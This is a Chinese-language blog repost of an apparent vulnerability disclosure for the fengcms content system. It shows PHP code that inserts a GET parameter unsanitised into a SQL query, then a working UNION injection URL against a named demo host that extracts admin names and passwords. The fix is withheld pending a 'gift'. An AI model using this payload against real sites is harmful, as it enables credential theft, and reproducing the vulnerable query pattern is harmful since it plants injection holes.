时间: 2020-10-11|tag: 37次围观|0 条评论

一枚注入直接出数据非盲注。就用官方给的演示站做测试。不知道你们有没有小礼物呢?

详细说明:

/app/controller/contentController.php
 

class contentController extends Controller{

private $content;


public function __construct(){
$this->content=M("module")->content($_GET['project'],$_GET['id']);
}

public function index(){
$_GET['classid']=$this->content['classid'];
return $this->display($this->content['template'],$this->content);
}
}

将$_get[project]带入content方法。进去看看:
 

public function content($table,$id){

$arr=D($table)->where('id="'.$id.'"')->getone();

直接将$table带入SQL语句。

我就不继续跟了,看漏洞证明吧。

官方给的测试站做验证:
 

http://guf521656.h163.92hezu.org/?controller=content&project=single%20where%201=2%20union%20select%2001,concat(admin,0x23,password),3,0x73696E676C652E68746D6C,5,6,7,8,9,10,11%20from%20f_manage%23

得到数据:
 

fengcms SQL注射一枚 – 网站安全 – 自学php插图

 

修复方案:

送小礼物我就提供帮助哦~

    上一篇: 网御星云第二集某重要业务系统爆出SQL注入Orac

    下一篇: URP通杀第二弹(短小精悍的小题目) - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《fengcms SQL注射一枚 – 网站安全 – 自学php
   

还没有人抢沙发呢~